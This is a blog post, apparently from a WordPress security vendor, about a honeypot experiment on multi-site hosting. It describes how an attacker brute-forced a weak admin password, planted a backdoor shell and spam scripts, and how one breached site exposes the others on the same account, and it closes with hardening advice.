Multi-site hosting security issues recently attract more attention. Multi-site hosting plans allow you to host more than one website on your hosting account. It’s a great solution, and it makes the administration more comfortable at the lower cost in case you don’t need more CPU or memory resources to sustain a high traffic website.
However, from the security perspective, it could be a risky solution. Recently we experimented with several “honeypot” websites just to observe attacks on the WordPress sites with various vulnerabilities and low-security level settings.
Setting up honeypot sites to work as a bait
First of all, we bought a multi-site hosting plan. We have dedicated two domain names for this experiment, and overall we have deployed eight websites. Two for both domain names and three subdomain sites for each domain.
All these websites were packed up with some dummy content and various vulnerabilities. There were several sites with outdated WordPress software, several with weak passwords and no captcha. Several sites with multiple vulnerabilities related to the configuration of directory and file permissions, file access control and more.
We have put some additional software to trace absolutely everything what happens on the server. All requests and other data necessary for the investigation recorded with the smallest details.
We left everything for a while just to give some time for search engines to index these websites and for attackers to find them.
Nature of attacks and results
After few weeks we received the notice from the hosting company that php_mail function is disabled for our account as there are signs that our account is used to spread spam emails in large quantities.
Hosting company notice was a signal that security of one of the websites breached and now we can look at the logged data to see what happened.
First of all, we need to mention that attacks were made by software tools, automatically. We know it by the huge amount of requests in a brief period. The second and quite important thing that security breach made on the website with a weak password. Password picking, guessing or brute-forcing is one of the simplest and popular types of attacks. That’s why the WordPress suggest you use strong passwords for WordPress user accounts.
By analyzing the content of the files with our malware scanner (still in a beta version, but it’s under rapid development, and soon it will be available for everyone) we have noticed a lot of new files created.
An attacker managed to hack the password of WordPress for a single available user with admin rights. Username is easy to find just by looking at the author of blog posts. Later an attacker put a backdoor shell on one of the WordPress theme files by using theme editor. Then he used the shell to connect to the server and create new files or alter the original ones. There were several files with shell and several to send spam emails. A lot of files and directories had the same “last edited” date, even those untouched. We think this made on purpose, just to make it harder to find the files that were altered or created by an attacker just by using “last edited” date filtering.
Almost all malicious code made by using regular expressions and packed with the base64 method. It’s harder for amateur WordPress user to understand what does this code do, but it was easier for our malware scanner to find the malicious code just by comparing it to malware patterns available on our malware database.
You can see how it looks like when decoded from the base64 package. Someone have put a lot of time and knowledge just to built this piece of malicious software. This code gave us a lot of new information, and we have updated our malware database with several new patterns.
Multi-site hosting security risks
Now the worst thing. If you had a multi-site hosting, you noticed the way it deals with the directories and files for each website. You have a “public_html” directory which holds the files for main website (domain). Files of other sites stored in separate directories on the root “public_html” directory. It means that all data of all sites stored in the same directory and here comes the worst part – if one of your websites got hacked, all other websites could be hacked without any additional effort.
An attacker could access all files of all WordPress sites on the same account just by executing a shell which allows connecting to the server. He could gain access to any directory or any file and make changes or even create and delete files. There are no isolated environments for each site on multi-site hosting, everything lays down on the same server, in the same “public_html” root directory.
If you have several projects hosted on the same multi-site hosting, please make sure all of them are protected equally high. Your multi-site hosting security or more accurately security of your WordPress sites hosted on the same multi-site hosting is as effective as the safety of site with the weakest level of security. If it’s hacked, all other websites on the same account could be hacked instantly. We suggest you harden all WordPress installations equally or use separate individual hosting accounts for each site if they hold any sensitive information and are quite important to you.